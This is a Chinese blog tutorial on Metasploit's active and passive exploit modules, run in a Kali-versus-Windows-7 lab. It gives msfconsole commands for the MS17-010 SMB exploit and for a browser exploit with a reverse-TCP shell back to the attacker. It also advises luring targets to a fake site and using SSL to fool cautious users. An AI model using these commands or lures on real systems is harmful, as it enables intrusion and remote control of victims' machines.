【MSFconsole进阶】exploits(渗透攻击模块):Active Exploit(主动渗透攻击)、Passive Exploit(被动渗透攻击)

最新推荐文章于 2024-04-22 17:09:59 发布
最新推荐文章于 2024-04-22 17:09:59 发布
阅读量3.6k 收藏 43
点赞数 5
分类专栏: 【工具】网络安全 文章标签: 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/124909435
版权

目录

exploits(渗透攻击模块)

一、简介:

二、Active Exploit(主动渗透攻击)

2.1、前提:

2.2、示例:

2.2.1、实验环境:

2.2.2、第一步:信息收集

2.2.3、第二步:测试目标是否在线

2.2.4、第三步:测试漏洞为ms17_010

2.2.5、第四步:进入到会话,执行

三、Passive Exploit(被动渗透攻击)

3.1、简介:

3.2、示例

3.2.1、实验环境:

3.2.2、第一步:装载模块

3.2.3、第二步:

3.2.4、第三步:诱使目标点击

3.2.5、第四步:进入会话

 

exploits(渗透攻击模块)

一、简介:

利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法

分为主动(Active Exploit)、被动(Passive Exploit)

确实挺多的

 

 

二、Active Exploit(主动渗透攻击)

2.1、前提:

发现服务--->寻找漏洞

目标开启了某种服务,并且这个服务存在漏洞

2.2、示例:

2.2.1、实验环境:

目标关闭防火墙

目标:Windows 7 旗舰版 Service Pack 1 。IP地址为192.168.190.138

攻击机:Kali 。IP地址为192.168.190.131

2.2.2、第一步:信息收集

使用nmap扫描目标主机看是否存在常见漏洞

db_nmap --script=vuln 192.168.190.138

结果

Risk factor: HIGH 

风险因素:高

A critical remote code execution vulnerability exists in Microsoft SMBv1

Microsoft SMBV1中存在关键的远程代码执行漏洞

servers (ms17-010)

2.2.3、第二步:测试目标是否在线

使用辅助模块auxiliary

# 装载具体模块

use auxiliary/scanner/discovery/arp_sweep

#可以查看相关命令

show options

# 设置模块(目标、速度)

set rhosts 192.168.190.138

# 设置线程

set threads 250

# 启动模块

run

如果扫不出来,就可能是有防火墙(我是提前关了防火墙的) 

2.2.4、第三步:测试漏洞为ms17_010

# 使用ms17的漏洞利用模块

use exploit/windows/smb/ms17_010_psexec

# 查看使用方法

show options

# 设置

set rhosts 192.168.190.138

# 执行漏洞攻击

run

Unable to find accessible named pipe!

无法找到可访问的命名管!

 Exploit completed, but no session was created.

漏洞利用完成,但未创建会话。

(如果创建成功再执行第四步)

2.2.5、第四步:进入到会话,执行

#可以查看已经创建的会话

session -l

#进入这个对应的shell

sessions -i ID

再执行自己想执行的命令

三、Passive Exploit(被动渗透攻击)

3.1、简介:

浏览器软件漏洞攻击和文件格式漏洞攻击,引诱目标用户打开触发。

#查看支持的渗透攻击模块

show exploits    

3.2、示例

3.2.1、实验环境:

目标开启防火墙

目标:Windows 7 旗舰版 Service Pack 1 。IP地址为192.168.190.138

攻击机:Kali 。IP地址为192.168.190.131

现在使用(主动攻击)Active进行攻击不会成功

使用(被动攻击)Passive,构造链接,诱使目标连接,利用浏览器的漏洞

3.2.2、第一步:装载模块

挂载模块

use exploit/windows/browser/ms07_017_ani_loadimage_chunksize

show options
 

3.2.3、第二步:

伪造网站,诱使目标打开

SRVHOST可以指定为本机的IP地址,我们也可以打开SSL和设置SSL的证书,迷惑有安全意识的用户

URIPATH是访问的URL地址,可手动指定,比如192.168.190.131/service(一般默认根目录)

#设置

set SRVHOST 192.168.190.131

set PAYLOAD windows/shell/reverse_tcp

set LHOST 192.168.190.131

exploit

3.2.4、第三步:诱使目标点击

伪造了一个存在漏洞利用代码的WEB站点,这个站点等待浏览器版本存在漏洞的用户去访问它,将exploit注入到浏览器进程中,利用浏览器漏洞执行payload

我们在目标PC上用不同浏览器访问这个URL

访问以后,就会有记录,并尝试建立连接

没有后续就是可能没有相关已知的漏洞,一直处于等待阶段

3.2.5、第四步:进入会话

#可以查看已经创建的会话

session -l

#进入这个对应的shell

sessions -i ID

再执行自己想执行的命令

黑色地带(崛起)
关注
  • 5
    点赞
  • 43
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
MSFconsole可以辅助完成这些步骤,例如使用nmap模块进行端口扫描,利用exploits进行攻击,通过payloads在目标系统上建立持久化通道。 4. **Windows兼容性**:虽然Metasploit通常与Linux环境关联,但其Windows版本...
失败的,最详细的进攻MS08-067漏洞的前期准备工作
qq_48818099的博客
05-22 1011
详细失败的MS08-067的漏洞讲解与进攻;
关于使用Metasploit中出现Exploit completed, but no session was created的解决办法
热门推荐
qq_42430737的博客
06-14 3万+
最近准备学习有关渗透测试方面的内容,记录一些自己遇见的问题与解决方法,大佬勿喷。 我在做第一个实验:利用ms08-067入侵靶机,获取控制权时,就遇见了下面这个问题: Exploit completed, but no session was created 我先把我的命令行加上: msf5 > use /windows/smb/ms08_067_netapi msf5 exploit(windows/smb/ms08_067_netapi) > set RhOSTS 192.168.0.106
记录一次体验kali渗透工具MSF以及msfconsole命令详解
最新发布
ch_ycc的博客
04-22 2801
msfconsole简称msf是一款常见的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全人员的使用。
MSF漏洞利用完成但无法创建会话的几种原因
慢就是快
12-02 3万+
文章目录1.引言2.原因2.1漏洞payload和目标架构不匹配2.1.1 解决办法2.2 参数LHOST/SRVHOST 配置不当2.2.1 解决办法2.3 使用了NAT模式2.3.1 解决办法2.4存在杀软/EDR终端管理等2.4.1 解决办法2.5漏洞利用模块存在问题2.5.1 解决办法2.6目标已经修复漏洞打了补丁2.6.1 解决办法2.7 防火墙限制2.7.1 解决办法 1.引言 在实际攻防中经常用到一些漏洞模块去测试目标是否存在对应漏洞,比如下列模块exploit/windows/smb/p
exploit已完成,但没有创建会话exploit completed, but no session was created
08-22 1万+
The "no session was created" message occurs if one of the following happens: 1) The exploit you use doesn't work against the target you selected. Could be the exploit is for a different ve...
Metasploit-ms17-010永恒之蓝
algae
04-21 6375
永恒之蓝是去年玩剩下的了,记得当初刚刚泄露的时候,用的是NSA那个fb.py脚本去复现漏洞的。现在Metasploit里面已经集成了17-010漏洞,渗透测试更加方便与正式化,内网中用17-010去测一测会发现意外惊喜哦。 写在前面起初在Docker环境下最后执行exploit的时候总是拿不到sessions,换了很多系统失败了很多次。...
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
Metasploit框架是一个综合的渗透测试平台,它提供了大量的模块,包括漏洞利用、扫描、后渗透工具等。这些模块使得安全专家能够快速地识别和利用目标系统中的漏洞。下面我们将详细讨论Metasploit的主要组成部分及其...
使用metasploit攻击实例讲解1-ms10-046快捷方式图标漏洞
12-29
Metasploit是一款广泛使用的开源安全工具,它包含了大量预构建的攻击模块,便于安全专家进行漏洞利用。 ms10-046漏洞,也被称为“LNK本地提权漏洞”,是2010年发现的一个严重安全漏洞。这个漏洞主要影响Windows操作...
内网域渗透文档过程有截图
07-02
9. 渗透测试:使用 msfconsole 连接到服务器,执行 exploit,获取控制权,并使用 screenshot 命令抓取屏幕截图。 10. 系统信息查询:使用 ifconfig 查询内网 IP,查看系统信息,并将终端编码修改为 GBK。 11. 域...
使用Kali Linux Metasploit复现永恒之蓝
xujing19920814的博客
10-01 5332
使用Kali Linux Metasploit复现永恒之蓝
exploit completed, but no session was created
gRpc的博客
08-24 3695
metasploit
使用metasploit利用vsftpd-2.3.4的backdoor进行exploit时出现的exploit completed but no session was created的解决办法
xixitaoguliuxian的博客
07-25 1万+
我在使用metasploit利用vsftpd-2.3.4的backdoor进行exploit时,总是出现的exploit completed but no session was created的问题,针对这个现象,我找出了几点可能会导致这个问题出现的原因。 1、被攻击机器的防火墙打开了。 2、下载的vsftpd_2.3.4的默认配置有问题:          a)如果exploit时显示T...
永恒之蓝---ms17_010漏洞
weixin_50574090的博客
03-03 4379
一 测试准备 攻击机器,kali 测试机器,win7,需要带有ms_17_010漏洞 二 msf漏铜测试 首先在kali上进入msf模块 使用 命令msfconsole 准备:开启数据库服务,以及完成数据库初始化 打开msfconsole 查找ms17_010漏洞,加载模块payload 加载漏洞,使用metaspolit模拟攻击,反向代理到测试机 如上图说明漏洞利用成功 成功建立连接,侵入测试机 成功监听了测试机192.168.234.134...
浅析Windows命名管道Named Pipe
谢公子的博客
01-06 1万+
管道 讲命令管道之前先来讲下管道。管道并不是什么新鲜事物,它是一项古老的技术,可以在很多操作系统(Unix、Linux、Windows 等)中找到,其本质是是用于进程间通信的共享内存区域,确切的说应该是线程间的通信方法(IPC)。 管道是一个有两端的对象。一个进程向管道写入信息,而另外一个进程从管道读取信息。进程可以从这个对象的一个端口写数据,从另一个端口读数据。创建管道的进程称为管道服务器(Pipe Server),而连接到这个管道的进程称为管道客户端(Pipe Clien...
ms08-067漏洞的复现及所遇到的问题分析
ianTok
10-12 4699
ms08-067
msf反弹shell成功,却无法建立会话处理办法
yang1234567898的博客
01-07 4942
报错:Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444). 如果run的时候出现以下问题导致建立会话失败,可能是端口4444被占用了, 在终端输入 “netstat -tulpen”,查看进程端口信息 通过命令”fuser -k 端口号/tcp“,删除4444端口进程 ...
kali渗透进入msf
10-31
Kali是一个被广泛应用于渗透测试和网络安全的Linux发行版。而Metasploit Framework(MSF)是一个开源的渗透测试框架,它提供了一系列功能强大的工具和资源,帮助渗透测试人员实施攻击并评估系统的安全性。 在Kali中,可以使用Metasploit Framework来进行渗透测试,以测试目标系统的安全性。下面是进入MSF的步骤: 1. 打开终端:首先,在Kali Linux中打开一个终端窗口。你可以使用快捷键Ctrl+Alt+T来打开终端,或者在菜单中找到终端应用。 2. 启动MSF控制台:在终端中输入msfconsole并按下回车键,这将启动Metasploit Framework控制台。 3. 更新MSF:在控制台中,输入命令msfupdate并按下回车键,这将确保你使用的是最新的Metasploit Framework版本。 4. 选择攻击模块:通过输入命令use来选择你想要使用的攻击模块。例如,如果你想要使用一个特定的漏洞攻击模块,可以输入use exploit/[exploit_name]命令。 5. 设置攻击选项:根据选定的攻击模块,通过输入set命令来设置攻击选项。这些选项可能包括目标IP地址、端口等。 6. 运行攻击:通过输入命令exploit来运行已设置好的攻击。控制台将显示攻击的进展情况,并提供相关的反馈信息。 需要注意的是,在进行渗透测试时,务必遵循法律和道德规范,并且只能在授权范围内对系统进行测试。任何未经授权的攻击行为都是非法的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值